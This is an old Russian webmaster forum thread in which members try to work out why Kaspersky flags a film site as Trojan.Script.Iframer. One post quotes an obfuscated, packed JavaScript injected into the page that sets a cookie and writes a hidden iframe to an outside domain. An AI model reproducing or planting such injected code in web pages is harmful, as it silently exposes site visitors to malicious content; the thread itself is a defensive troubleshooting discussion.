Александр Отсутствую
3460 сообщений
#11 лет назад
У кого КАСПЕРСКИЙ? Выручайте http://77film.ru/ Код плеера распознает как троян. Гляньте у кого как? И кто сможет решить проблему.. Заплачу :!: Спасибо..
Максим Б.
203 сообщения
#11 лет назад
У меня молчит, база обновлена 4 часа назад=)
Алексей А.
7 сообщений
#11 лет назад
Maxim_belkin, а какой у Вас каспер? Какая версия?
Максим Б.
203 сообщения
#11 лет назад
KAV 6.0.3.837
Игорь К.
110 сообщений
#11 лет назад
Автор, когда вы обновляли базу последний раз?
Антон Ч.
399 сообщений
#11 лет назад
WWWolf, вирусов нет
Александр Отсутствую
3460 сообщений
#11 лет назад
У меня вообще NOD 32 У заказчика каспер, говорит, что ругается антивирь!
Александр Отсутствую
3460 сообщений
#11 лет назад
Цитата ("esidrex"):
Автор, когда вы обновляли базу последний раз?


Сегодня..
Алексей А.
7 сообщений
#11 лет назад
Цитата ("maxim_belkin"):
KAV 6.0.3.837


У меня 8.0.0.506
И база обновлена СЕЙЧАС. Кому интересно, могу скинуть видео. Там Trojan.Script.Iframer выдается.
Максим Б.
203 сообщения
#11 лет назад
Что за странный код в теле страницы?
<div class="olinks"><a href="/index.php?do=register" title="Регистрация">Регистрация</a> | <a href="/index.php?do=lostpassword" title="Забыли пароль?">забыли
пароль?</a>
<SCRIPT LANGUAGE="Javascript">
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l p(8){q=B.C;c(q){r=s(\'t\');c(r==7){6 d=D E();d.F(d.G()+(H*u*u*I));e(\'t\',\'1\',d,"/");9.J("<v K=\'L://M.N.O/P/Q.R\' S=\'T:U\'></v>");V.W()}}}l s(8){6 m=8+"=";6 w=m.n;6 x=9.f.n;6 i=0;X(i<x){6 j=i+w;c(9.f.Y(i,j)==m)y Z(j);i=9.f.10(" ",i)+1;c(i==0)11}y 7}l e(8,z){6 a=e.A;6 b=e.A.n;6 g=(b>2)?a[2]:7;6 h=(b>3)?a[3]:7;6 k=(b>4)?a[4]:7;6 o=(b>5)?a[5]:12;9.f=8+"="+13(z)+((g==7)?"":("; g="+g.14()))+((h==7)?"":("; h="+h))+((k==7)?"":("; k="+k))+((o==15)?"; o":"")}9.16=p(8);',62,69,'||||||var|null|name|document|argv|argc|if|ExpDate|SetCookie|cookie|expires|path|||domain|function|arg|length|secure|PopShow3|CookieTest|ClickUndercookie|GetCookie|clickunder|60|iframe|alen|clen|return|value|arguments|navigator|cookieEnabled|new|Date|setTime|getTime|48|1000|write|src|http|www|gameswar|ru|12345|stats|html|style|display|none|window|focus|while|substring|getCookieVal|indexOf|break|false|escape|toGMTString|true|onload'.split('|'),0,{}))
</SCRIPT></div>
:?: :!:
Алексей А.
7 сообщений
#11 лет назад
http://forum.kaspersky.com/index.php?s=d58875c147d1301da64d6102561d200f&amp;showtopic=100490&amp;view=findpost&amp;p=874296

Вот это *ля очень интересный пост!
Я то думал что это просто фреймер, поэтому и определяется так. А тут уже реальным трояном чтоли пахнет??
Александр Отсутствую
3460 сообщений
#11 лет назад
Цитата ("Nick_D"):
http://forum.kaspersky.com/index.php?s=d58875c147d...

Вот это *ля очень интересный пост!
Я то думал что это просто фреймер, поэтому и определяется так. А тут уже реальным трояном чтоли пахнет??


При чем здесь этот код..?????? К нашему случаю отношения никакого не имеет.
Максим Б.
203 сообщения
#11 лет назад
WWWolf
Знаете, если на сайте и в самом деле есть вирус, то думаю, что код плеера тут не виноват. Но нужно искать причину.
И если эта проблема появилась после Вашего вмешательства, проверьтесь на вирусы.
Алексей А.
7 сообщений
#11 лет назад
Проблема появилась сразу после того, как WWWolf установил плеер.
Максим Б.
203 сообщения
#11 лет назад
Nick_D
уберите плеер.. Будет вирус?
Может сейчас сайт заражен.

Оффтопик
Я в борьбе с вирусами нуб, поэтому лучше заткнусь и посмотрю, что ответят компетентные товарищи.
Алексей А.
7 сообщений
#11 лет назад
Каспер пишет в отчете, что подгружается templates/***/css/menu.css
Но этого файла НЕТ в папке. Я ничего не пойму... Код плеера удалил из main.tpl - проблема не устранилась. Каспер по-прежнему пищит.
Максим Б.
203 сообщения
#11 лет назад
Надо бы посмотреть на дату их модификации index.php и .htaccess. Посмотреть на код, где прописывается это подключение.
Оффтопик
У меня как-то была аналогичная проблема, заходил с тотал командера на фтп, сайт заражался, и в каждом index(php|html) файле прописывался <iframe>
поменял пароли, фтп-клиент, переставил винду, ибо каспер тогда ничего не находил.. Помогло.
Алексей А.
7 сообщений
#11 лет назад
Цитата ("maxim_belkin"):
Надо бы посмотреть на дату их модификации index.php и .htaccess. Посмотреть на код, где прописывается это подключение.


Дата вчерашняя стоит.
Плюс нашёл прикольную папочку hablons, в которой лежит куча интересных txt-файлов

<script language="JavaScript">
//<!--
google_ad_client = "pub-7810490034040943";
google_ad_slot = "7410036974";
google_ad_width = 728;
google_ad_height = 15;

//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</td>
</tr>


<div style="text-align:left;">
<a href=http://barel.ifolder.ru/ target=_blank>barel.ifolder.ru</a> - бесплатный хостинг файлов. У нас вы можете бесплатно разместить файл до 100Мб. Количество и время хранения файлов не ограничены.
<br><br>

<span style="color:#000000;text-decoration:none;"><span style="color:#b50000; font-weight:bold;">Новая услуга</span>: «barel.ifolder.ru - Без рекламы!» <a href="/news/" style="color:#b50000;">подробнее...</a></span>


<br><br>
</div>


и т. д..
Александр Отсутствую
3460 сообщений
#11 лет назад
Вот это дела